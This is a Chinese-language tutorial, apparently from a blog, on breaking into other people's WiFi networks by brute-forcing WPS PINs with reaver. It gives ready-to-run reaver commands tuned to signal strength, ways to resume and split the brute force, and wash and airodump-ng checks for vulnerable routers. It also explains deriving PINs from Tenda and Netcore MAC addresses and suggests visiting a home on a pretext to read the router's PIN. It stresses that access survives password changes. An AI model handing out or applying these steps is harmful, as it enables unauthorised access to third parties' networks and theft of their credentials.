已知PIN码是 49312119
破解出密码是 #$%19283746
和暴力破解密码相比,利用wps漏洞穷举pin码破解密码不像暴力破解那样全靠字典和硬件,而且就算wifi主人修改密码,只要不更换pin码,也可以很快再次得到密码,但是必须要路由支持并开启WPS功能;如何得到路由的PIN 码呢?
1.最常用的方法是用reaver软件之类的软件进行穷举PIN码,reaver 命令:
reaver -i mon0 -b mac -S -v -n
reaver命令参数(转):
- -i 监听后接口名称
- -b 目标mac地址
- -a 自动检测目标AP最佳配置
- -S 使用最小的DH key(可以提高PJ速度)
- -vv 显示更多的非严重警告
- -d 即delay每穷举一次的闲置时间 预设为1秒
- -t 即timeout每次穷举等待反馈的最长时间
- -c 指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9 参数防止路由僵死
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)应因状况调整参数(-c后面都已目标频道为1作为例子)目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
一个穷举过程:
在穷举的过程种reaver会生成以路由mac地址为名的wpc文件,一时半会pin不出来,第二天pin的时候命令加参数 -s file.wpc继续pin;或者多开几个终端窗口每个窗口都从不同的数字段开始pin,这样提高效率但也容易漏pin,比如 reaver -i mon0 -b mac -S -v -n -p 9000(窗口1) reaver -i mon0 -b mac -S -v -n -p 8000 (窗口2) 。。。。。。最后得到pin码和psk码(也就是密码),如果以后人家修给密码,只要不关闭wps功能就可以用reaver -i mon0 -b mac -p xxxxxxxx来再次得到密码。
一段时间过后,穷举出密码:
这样pin也是有限制的,比如要被pin出的路由器必须得开启wps功能;貌似现在很多都是防pin路由器或300秒pin限制的。
判断一个wifi信号是否开启了wps可以被探测出pin码,可以用airodump-ng命令或wash命令检测:
1).airodump-ng:MB项的那个54e.和54e,是54e.的就可以探测pin
2).wash -i mon0 -C:wps locked的那个项,YES的就可以被探测pin
利用wps漏洞破解wifi密码的软件还有wifite,bully等(具体看日志末尾的推荐阅读).
2.特殊路由的pin码可以通过计算得出
有些路由pin码可以通过计算得到:腾达和磊科的产品如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值。
比如这个:bssid :Tenda_579A18 mac :C8:3A:35:57:9A:18 通过计算器将mac后6位换算成10进制数,得到5741080(pin码的前7位),最多试10次或通过软件得到该路由pin码!
当然还有腾达路由pin码计算器软件:
3.当然也可以假装干其他事,去人家看一下路由底部的pin码什么的。。。
